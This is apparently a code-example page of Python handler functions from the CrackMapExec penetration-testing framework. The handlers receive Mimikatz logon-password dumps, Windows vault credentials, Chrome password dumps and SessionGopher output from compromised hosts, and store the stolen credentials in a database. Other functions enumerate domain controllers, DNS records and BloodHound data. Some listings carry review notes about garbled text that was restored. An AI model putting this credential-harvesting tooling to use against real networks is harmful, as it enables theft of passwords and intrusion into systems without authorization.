コード例 #1
    def on_response(self, context, response):
        """Handle the POST carrying Get-NetDomainController output.

        Acknowledges the request, stops tracking the sending host, then reads
        each remaining table row as ``hostname domain ip``, records the host
        in the database as a domain controller and writes the raw payload to
        a timestamped log file. Rows that are exactly CRLF or start with
        ``Name`` / ``---`` are ignored.
        """
        response.send_response(200)
        response.end_headers()
        body_len = int(response.headers.getheader('content-length'))
        data = response.rfile.read(body_len)

        # The response has arrived; this host no longer needs tracking.
        response.stop_tracking_host()

        added = 0
        if not len(data):
            return

        for line in StringIO(data):
            if line == '\r\n' or line.startswith('Name') or line.startswith('---'):
                continue
            try:
                # filter(None, ...) drops the empty strings left by runs of spaces.
                hostname, domain, ip = filter(None, line.strip().split(' '))
                # Keep only the first label of each name, upper-cased.
                hostname = hostname.split('.')[0].upper()
                domain = domain.split('.')[0].upper()
                context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip))
                context.db.add_computer(ip, hostname, domain, '', dc=True)
                added += 1
            except Exception:
                context.log.error('Error parsing Domain Controller entry')

        context.log.success('Added {} Domain Controllers to the database'.format(highlight(added)))

        log_name = 'Get_NetDomainController-{}-{}.log'.format(
            response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved raw output to {}".format(log_name))
コード例 #2
ファイル: mimikatz.py プロジェクト: 0xe7/CrackMapExec
    def on_response(self, context, response):
        """Handle the POST carrying Mimikatz output.

        Acknowledges the request and stops tracking the sender. When the
        command that was run contained ``sekurlsa::logonpasswords`` the
        payload is parsed with ``self.parse_mimikatz`` and each credential
        set is stored against the sender's database host id; any other
        output is only echoed. The raw payload is always written to a
        timestamped ``Mimikatz-*.log`` file.
        """
        response.send_response(200)
        response.end_headers()
        body_len = int(response.headers.getheader('content-length'))
        data = response.rfile.read(body_len)

        # Response received: the sender no longer needs tracking.
        response.stop_tracking_host()

        if not len(data):
            return

        if 'sekurlsa::logonpasswords' in self.command:
            creds = self.parse_mimikatz(data)
            if len(creds):
                # The sender's host id is the same for every set; look it up once.
                hostid = context.db.get_computers(response.client_address[0])[0][0]
                for credtype, domain, username, password, _, _ in creds:
                    context.db.add_credential(credtype, domain, username, password, pillaged_from=hostid)
                    context.log.highlight('{}\\{}:{}'.format(domain, username, password))

                context.log.success("Added {} credential(s) to the database".format(highlight(len(creds))))
        else:
            context.log.highlight(data)

        log_name = 'Mimikatz-{}-{}.log'.format(
            response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved raw Mimikatz output to {}".format(log_name))
コード例 #3
    def on_response(self, context, response):
        """Handle the POST carrying Mimikatz output.

        The request is acknowledged and the sender is no longer tracked. If
        the command that was run contained ``sekurlsa::logonpasswords``, the
        payload is parsed with ``self.parse_mimikatz`` and each credential
        set is stored against the sender's database host id; otherwise the
        payload is only echoed. The raw payload is always written to a
        timestamped ``Mimikatz-*.log`` file.
        """
        response.send_response(200)
        response.end_headers()
        data = response.rfile.read(int(response.headers.getheader('content-length')))

        # The response is in hand; tracking of this host can stop.
        response.stop_tracking_host()

        if not data:
            return

        if 'sekurlsa::logonpasswords' not in self.command:
            context.log.highlight(data)
        else:
            creds = self.parse_mimikatz(data)
            if creds:
                sender = response.client_address[0]
                for credtype, domain, username, password, _, _ in creds:
                    # The host id is resolved per credential set.
                    hostid = context.db.get_computers(sender)[0][0]
                    context.db.add_credential(credtype, domain, username, password, hostid)
                    context.log.highlight('{}\\{}:{}'.format(domain, username, password))

                context.log.success("Added {} credential(s) to the database".format(highlight(len(creds))))

        log_name = 'Mimikatz-{}-{}.log'.format(
            response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved raw Mimikatz output to {}".format(log_name))
コード例 #4
    def on_response(self, context, response):
        """Handle the POST carrying Get-NetDomainController output.

        Acknowledges the request, stops tracking the sender and turns each
        table row (``hostname domain ip``) into a domain-controller record
        in the database. CRLF-only lines and lines starting with ``Name`` or
        ``---`` are ignored. The raw payload is saved to a timestamped log.
        """
        response.send_response(200)
        response.end_headers()
        data = response.rfile.read(int(response.headers.getheader('content-length')))

        # Response received: the sender no longer needs tracking.
        response.stop_tracking_host()

        added = 0
        if len(data):
            rows = (
                line for line in StringIO(data).readlines()
                if line != '\r\n' and not line.startswith(('Name', '---'))
            )
            for row in rows:
                try:
                    # Drop the empty strings produced by runs of spaces.
                    hostname, domain, ip = filter(None, row.strip().split(' '))
                    # Short (first-label) names only, upper-cased.
                    short_host = hostname.split('.')[0].upper()
                    short_domain = domain.split('.')[0].upper()
                    context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(short_host, short_domain, ip))
                    context.db.add_computer(ip, short_host, short_domain, '', dc=True)
                    added += 1
                except Exception:
                    context.log.error('Error parsing Domain Controller entry')

            context.log.success('Added {} Domain Controllers to the database'.format(highlight(added)))

            log_name = 'Get_NetDomainController-{}-{}.log'.format(
                response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved raw output to {}".format(log_name))
コード例 #5
ファイル: bloodhound.py プロジェクト: 0xe7/CrackMapExec
    def parse_ouput(self, data, context, response):
        '''
        Parse the output from Invoke-BloodHound

        ``data`` is split on the ``!-!`` separator; each chunk is classified
        by the pair of column headers it contains and written out as a CSV
        named after its category, the sender's address and a timestamp. The
        ``" "`` joins between quoted fields are rewritten as line breaks
        first. Chunks matching none of the header pairs are dropped.
        '''
        # (header, header, base name) in match-priority order; the first pair
        # present in a chunk wins. Every base name except 'user_sessions'
        # already ends in '.csv', so those files carry the suffix twice.
        categories = (
            ("ComputerName", "UserName", 'user_sessions'),
            ("GroupName", "AccountName", 'group_membership.csv'),
            ("ComputerName", "AccountName", 'local_admins.csv'),
            ("SourceDomain", "TrustType", 'trusts.csv'),
            ("ObjectName", "ObjectType", 'acls.csv'),
        )
        for chunk in data.split("!-!"):
            for first, second, base in categories:
                if first in chunk and second in chunk:
                    log_name = '{}-{}-{}.csv'.format(
                        base, response.client_address[0],
                        datetime.now().strftime("%Y-%m-%d_%H%M%S"))
                    write_log(chunk.replace('" "', '"\n"').replace(' "', '"'), log_name)
                    context.log.info("Saved csv output to {}".format(log_name))
                    break
コード例 #6
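 def call_cmd_args(self):
     """Invoke the method matching every command-line option that was set.

     Each attribute of ``self.args`` whose name is also a callable attribute
     of ``self`` is treated as a sub-command: when its value is neither
     ``False`` nor ``None`` the method is called with no arguments. If
     ``self.export`` is truthy, ``str()`` of each result is handed to
     ``write_log`` together with ``self.export[0]``.
     """
     for name, value in vars(self.args).items():
         # Unset flags (False/None) are not commands to run.
         if value is False or value is None:
             continue
         # Only names resolving to a callable on this object are commands;
         # plain data attributes and unknown option names are skipped.
         command = getattr(self, name, None)
         if not callable(command):
             continue
         # Lazy %-formatting: the message is only built if DEBUG is enabled.
         logging.debug('Calling %s()', name)
         result = command()
         if self.export:
             write_log(str(result), self.export[0])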
コード例 #7
    def parse_ouput(self, data, context, response):
        '''
        Parse the output from Invoke-BloodHound

        Splits ``data`` on the ``!-!`` separator and saves each recognised
        chunk as ``<category>-<sender ip>-<timestamp>.csv``. A chunk is
        recognised by the pair of column headers it contains; the first
        matching pair, in the order listed below, decides the category and
        unrecognised chunks are discarded. Before writing, the ``" "`` joins
        between quoted fields are turned into line breaks.
        '''
        def save_csv(chunk, category):
            # Category names other than 'user_sessions' already end in
            # '.csv', so those files end up with the suffix twice.
            log_name = '{}-{}-{}.csv'.format(
                category, response.client_address[0],
                datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(chunk.replace('" "', '"\n"').replace(' "', '"'), log_name)
            context.log.info("Saved csv output to {}".format(log_name))

        markers = [
            (("ComputerName", "UserName"), 'user_sessions'),
            (("GroupName", "AccountName"), 'group_membership.csv'),
            (("ComputerName", "AccountName"), 'local_admins.csv'),
            (("SourceDomain", "TrustType"), 'trusts.csv'),
            (("ObjectName", "ObjectType"), 'acls.csv'),
        ]
        for chunk in data.split("!-!"):
            category = next(
                (name for headers, name in markers if all(h in chunk for h in headers)),
                None)
            if category is not None:
                save_csv(chunk, category)
コード例 #8
    def on_admin_login(self, context, connection):
        """Read the target's network adapter configuration over WMI.

        Every adapter that reports an IP address has that address and its
        DNS suffix search order echoed to the log. The complete WMI result
        is JSON-encoded and saved to a timestamped
        ``network-connections-*.log`` file.
        """
        query = "select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration"
        cards = connection.wmi(query)
        for card in cards:
            ip_value = card['IPAddress'].get('value')
            if ip_value:
                suffixes = card['DNSDomainSuffixSearchOrder']['value']
                context.log.success(f"IP Address: {ip_value}\tSearch Domain: {suffixes}")

        # The whole result set is stored as a single list element, which is
        # the layout of the saved JSON.
        data = [cards]

        log_name = 'network-connections-{}-{}.log'.format(
            connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(json.dumps(data), log_name)
        context.log.info("Saved raw output to {}".format(log_name))
コード例 #9
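    def on_response(self, context, response):
        """Handle the POST carrying Mimikatz vault enumeration output.

        Acknowledges the request, stops tracking the sender, then scans the
        payload for ``Ressource`` lines: the URL is taken from that line, the
        user from the following line and the password from the line four
        below, each with the ``[STRING]`` marker removed. Entries whose
        password carries ``[BYTE*]`` are skipped. Complete entries are
        echoed and the raw payload is written to a timestamped log file.
        """
        response.send_response(200)
        response.end_headers()
        body_len = int(response.headers.getheader('content-length'))
        data = response.rfile.read(body_len)

        # Response received: the sender no longer needs tracking.
        response.stop_tracking_host()

        if not len(data):
            return

        lines = StringIO(data).readlines()
        creds = []
        try:
            for idx, line in enumerate(lines):
                if 'Ressource' not in line:
                    continue
                # Each field follows the first ':' of its line; the user and
                # password lines sit at fixed offsets, so a truncated block
                # raises IndexError and is reported below.
                url = lines[idx].split(':', 1)[1].strip().replace('[STRING]', '')
                user = lines[idx + 1].split(':', 1)[1].strip().replace('[STRING]', '')
                passw = lines[idx + 4].split(':', 1)[1].strip().replace('[STRING]', '')
                if '[BYTE*]' not in passw:
                    creds.append({'url': url, 'user': user, 'passw': passw})
        except Exception:
            # Narrowed from a bare ``except`` so KeyboardInterrupt/SystemExit
            # propagate; parse failures are still reported and the raw output
            # is still saved below for manual review.
            context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')

        if creds:
            context.log.success('Found saved Vault credentials:')
            for cred in creds:
                if cred['user'] and cred['passw']:
                    # NOTE(review): the two concatenations below were garbled in
                    # the listing; restored by analogy with the URL line.
                    context.log.highlight('URL: ' + cred['url'])
                    context.log.highlight('Username: ' + cred['user'])
                    context.log.highlight('Password: ' + cred['passw'])
                    context.log.highlight('')

        log_name = 'EnumVaultCreds-{}-{}.log'.format(
            response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved Mimikatz's output to {}".format(log_name))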
コード例 #10
    def on_response(self, context, response):
        """Handle the POST carrying SessionGopher output.

        Acknowledges the request, stops tracking the sender, echoes every
        stripped line of the payload and saves the raw payload to a
        timestamped ``SessionGopher-*.log`` file.
        """
        response.send_response(200)
        response.end_headers()
        body_len = int(response.headers.getheader('content-length'))
        data = response.rfile.read(body_len)

        # Response received: the sender no longer needs tracking.
        response.stop_tracking_host()

        if not len(data):
            return

        # The outer strip drops leading/trailing blank lines, the inner one
        # the per-line whitespace.
        for line in StringIO(data.strip()).readlines():
            context.log.highlight(line.strip())

        log_name = 'SessionGopher-{}-{}.log'.format(
            response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved output to {}".format(log_name))
コード例 #11
    def on_response(self, context, response):
        """Handle the POST carrying Get-ChromeDump output.

        Acknowledges the request, stops tracking the sender, echoes each
        line of the decoded payload and saves it to a timestamped
        ``ChromeDump-*.log`` file.
        """
        response.send_response(200)
        response.end_headers()
        body_len = int(response.headers.get('content-length'))
        data = response.rfile.read(body_len).decode()

        # Response received: the sender no longer needs tracking.
        response.stop_tracking_host()

        if not data:
            return

        for line in StringIO(data):
            context.log.highlight(line)

        log_name = 'ChromeDump-{}-{}.log'.format(
            response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved raw Get-ChromeDump output to {}".format(log_name))
コード例 #12
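    def on_admin_login(self, context, connection):
        """Enumerate DNS zones and their records on the target via WMI.

        Unless ``self.domains`` names a zone, the zone list is read from
        ``MicrosoftDNS_Zone``; the ``MicrosoftDNS_ResourceRecord`` entries
        of every zone are then grouped by record type, echoed to the log and
        written to a timestamped ``DNS-Enum-*.log`` file.
        """
        if self.domains:
            domains = [self.domains]
        else:
            domains = []
            output = connection.wmi('Select Name FROM MicrosoftDNS_Zone', 'root\\microsoftdns')
            if output:
                domains = [result['Name']['value'] for result in output]
                context.log.success('Domains retrieved: {}'.format(domains))

        report = []
        for domain in domains:
            # The zone name comes from the target (or from the user); escape the
            # two characters that are special inside a WQL string literal so a
            # name containing a quote or backslash cannot break out of it.
            safe_domain = str(domain).replace('\\', '\\\\').replace('"', '\\"')
            output = connection.wmi(
                'Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = "{}"'.format(safe_domain),
                'root\\microsoftdns')
            if not output:
                continue

            records_by_type = {}
            context.log.highlight("Results for {}".format(domain))
            report.append("Results for {}\n".format(domain))
            for entry in output:
                # Field 0 is taken as the record name and field 2 as the type;
                # field 1 is not used and fields 3.. form the value.
                fields = entry['TextRepresentation']['value'].split(' ')
                rname, rtype = fields[0], fields[2]
                rvalue = ' '.join(fields[3:])
                records_by_type.setdefault(rtype, []).append("{}: {}".format(rname, rvalue))

            for rtype, records in sorted(records_by_type.items()):
                context.log.highlight("Record Type: {}".format(rtype))
                report.append("Record Type: {}\n".format(rtype))
                for record in sorted(records):
                    context.log.highlight("\t" + record)
                    report.append("\t" + record + "\n")

        log_name = 'DNS-Enum-{}-{}.log'.format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        # Joined once instead of repeated string concatenation.
        write_log(''.join(report), log_name)
        context.log.info("Saved raw output to {}".format(log_name))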
コード例 #13
ファイル: enum_dns.py プロジェクト: 0xe7/CrackMapExec
    def on_admin_login(self, context, connection):
        """Enumerate DNS zones and records on the target through WMI.

        When ``self.domains`` is unset, zone names are read from
        ``MicrosoftDNS_Zone``; otherwise only that zone is queried. Each
        zone's ``MicrosoftDNS_ResourceRecord`` entries are grouped by record
        type, echoed and written to a timestamped ``DNS-Enum-*.log`` file.
        """
        wmi_namespace = 'root\\microsoftdns'
        if self.domains:
            domains = [self.domains]
        else:
            domains = []
            zones = connection.wmi('Select Name FROM MicrosoftDNS_Zone', wmi_namespace)
            if zones:
                for zone in zones:
                    domains.append(zone['Name']['value'])
                context.log.success('Domains retrieved: {}'.format(domains))

        report = ""
        record_query = 'Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = "{}"'
        for domain in domains:
            # NOTE(review): the zone name is interpolated into the WQL literal
            # without escaping; a name containing '"' would malform the query.
            records = connection.wmi(record_query.format(domain), wmi_namespace)
            if not records:
                continue

            by_type = {}
            context.log.highlight("Results for {}".format(domain))
            report += "Results for {}\n".format(domain)
            for entry in records:
                # Field 0 is the record name, field 2 the type; field 1 is not
                # used and everything from field 3 on forms the value.
                fields = entry['TextRepresentation']['value'].split(' ')
                label = "{}: {}".format(fields[0], ' '.join(fields[3:]))
                if by_type.get(fields[2], False):
                    by_type[fields[2]].append(label)
                else:
                    by_type[fields[2]] = [label]

            for rtype, labels in sorted(by_type.iteritems()):
                context.log.highlight("Record Type: {}".format(rtype))
                report += "Record Type: {}\n".format(rtype)
                for label in sorted(labels):
                    context.log.highlight("\t" + label)
                    report += "\t" + label + "\n"

        log_name = 'DNS-Enum-{}-{}.log'.format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(report, log_name)
        context.log.info("Saved raw output to {}".format(log_name))
コード例 #14
ファイル: enum_chrome.py プロジェクト: DeeLMind/CrackMapExec
    def on_response(self, context, response):
        """Handle the POST carrying Get-ChromeDump output.

        Acknowledges the request, stops tracking the sender, echoes each
        line of the payload and saves the raw payload to a timestamped
        ``ChromeDump-*.log`` file.
        """
        response.send_response(200)
        response.end_headers()
        body_len = int(response.headers.getheader('content-length'))
        data = response.rfile.read(body_len)

        # Response received: the sender no longer needs tracking.
        response.stop_tracking_host()

        if not len(data):
            return

        emit = context.log.highlight
        for line in StringIO(data).readlines():
            emit(line)

        log_name = 'ChromeDump-{}-{}.log'.format(
            response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved raw Get-ChromeDump output to {}".format(log_name))

    #def on_shutdown(self, context):
        #context.info('Removing SQLite assembly file')
        #connection.ps_execute('')
コード例 #15
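    def on_response(self, context, response):
        """Handle the POST carrying Mimikatz vault enumeration output.

        Acknowledges the request and stops tracking the sender. The payload
        is scanned for ``Ressource`` lines; for each, the URL is read from
        that line, the user from the next line and the password from the
        line four below, each with the ``[STRING]`` marker removed. Entries
        whose password carries ``[BYTE*]`` are skipped. Complete entries are
        echoed and the raw payload is written to a timestamped log file.
        """
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        # Response received: the sender no longer needs tracking.
        response.stop_tracking_host()

        if len(data):
            buf = StringIO(data).readlines()
            creds = []

            try:
                i = 0
                while i < len(buf):
                    if 'Ressource' in buf[i]:
                        # Fields follow the first ':'; the user and password
                        # lines sit at fixed offsets below the 'Ressource'
                        # line, so a truncated block raises IndexError, which
                        # is reported below.
                        url = buf[i].split(':', 1)[1].strip().replace('[STRING]', '')
                        user = buf[i + 1].split(':', 1)[1].strip().replace('[STRING]', '')
                        passw = buf[i + 4].split(':', 1)[1].strip().replace('[STRING]', '')

                        if '[BYTE*]' not in passw:
                            creds.append({'url': url, 'user': user, 'passw': passw})

                    i += 1
            except Exception:
                # Was a bare ``except``: narrowed so interrupts propagate while
                # parse errors are still reported and the raw log still saved.
                context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')

            if creds:
                context.log.success('Found saved Vault credentials:')
                for cred in creds:
                    if cred['user'] and cred['passw']:
                        # NOTE(review): the user/password concatenations were
                        # garbled in the listing; restored like the URL line.
                        context.log.highlight('URL: ' + cred['url'])
                        context.log.highlight('Username: ' + cred['user'])
                        context.log.highlight('Password: ' + cred['passw'])
                        context.log.highlight('')

            log_name = 'EnumVaultCreds-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved Mimikatz's output to {}".format(log_name))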
コード例 #16
    def on_response(self, context, response):
        """Handle the POST carrying execute_assembly output.

        Acknowledges the request, stops tracking the sender, decodes the
        body as UTF-8 (undecodable bytes are dropped), echoes each stripped
        line and saves the decoded payload to a timestamped
        ``execute_assembly-*.log`` file.
        """
        response.send_response(200)
        response.end_headers()
        body_len = int(response.headers.get('content-length'))
        data = response.rfile.read(body_len).decode('UTF-8', 'ignore')

        response.stop_tracking_host()

        if not data:
            return

        emit = context.log.highlight
        # Outer strip drops leading/trailing blank lines, inner strip the
        # per-line whitespace.
        for line in StringIO(data.strip()):
            emit(line.strip())

        log_name = 'execute_assembly-{}-{}.log'.format(
            response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved output to {}".format(log_name))